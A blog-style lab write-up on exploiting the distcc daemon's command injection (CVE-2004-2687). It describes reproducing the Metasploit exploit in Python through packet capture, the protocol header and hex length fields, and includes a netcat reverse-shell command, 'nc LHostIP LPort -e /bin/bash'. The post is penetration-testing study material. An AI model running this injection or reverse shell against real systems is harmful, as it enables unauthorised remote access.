Another day gone and another shell won! This time we are going to attack the Distcc deamon.
You can download the tool here dist_reverse_shell
If you’re interested in the backstory you can find more information here at the CVE Details CVE-2004-2687
To start, let’s make sure our target machine is vulnerable with Metasploit.
We are going to use exploit/unix/misc/distcc_exec to test out our machine. After putting in the RHOST (our target machine) we can run it and see that we do in fact get a shell.
That was the easy part. Now the real fun begins. How the hell do we replicate this in python? I decided to start with looking at how the metasploit code works. You can find the code that I referenced here.
The code was a little helpful but in the end it wasn’t nearly enough to help me reverse engineer this in python. So I needed to take a different approach.
Time for some good’ol fashion packet-sniffing. I broke out wireshark and ran the metasploit exploit again. As you can see below we captured a ton of great traffic.
When we inspect these packets we see the exact payload that is being transmitted. The red is what we are transmitting and the blue is the response.
To confirm that this is the entire payload, I copied and pasted the red text payload into netcat and sure enough I got a reverse shell on port 4444. Now we just need to understand what is being sent, why and how to make it our own.
This turned out to be the real hard part. I started by trying to modify the obvious command injection args to no avail. I assumed there must be something that is identifying the length of the payload. You will notice that at the end of ARGV00000000 there is a number. This is the length of the arg in hex. Easy enough. All I needed to do what decide on what my actual command was going to be and then calculate it on the fly.
Building the tool
We start with collecting our information from our user as usual
After getting our target machine IP we can move on to our local machine’s ip and the port we want to send the shell back to. We then take those values and build up the command that we are going to inject into our target machine. The command I am going with is our old friend netcat.
nc LHostIP LPort -e /bin/bash
When this executes it will send a shell back to us on our listening machine.
Now comes the fun part, building the exploit.
We start with the header of our call. The exploit-db code I looked at refered to this as “the magic dist fairy dust” I liked this so I ran with it.
Next we are going to build the header of the arg that we are going to inject our command into. You’ll notice that I haven’t added the size into the header yet. I also have some more fairy dust. This fairy dust is super important. It’s running a command ‘sh’ which is the bourne shell. This shell is almost guaranteed to be on all unix systems since it’s the oldest. We add in the -c command which means ‘execute a command’. We are going to follow this with our command in single quotes.
Our command gets built up here. I know breaking it out onto two lines is a bit verbose but for some reason when I had this all on a single line nano was treating it as a single string instead of letting me concat it together. So I just moved it down to the next line and that seemed to fix it.
Now we can calculate our hex length and add that to the header. You’ll notice the second line below says distCommandTrick. This tricks the distcc daemon into thinking that this is a compile operation.
Finally we add it all together and launch our attack
Here is what our buildup function looks like all together
Here is what the tool looks like when it successfully executes
and as you can see, we do in fact get a reverse shell.
So as I started with, another day and another shell won. From this point I would use another known exploit to elevate my permissions level. Perhaps I will do the next article on that. I really want to move onto buffer overflows though before I start the Offensive Security PWK course. I know they are going to touch on that and I really want exposure to it.
Until next time 🙂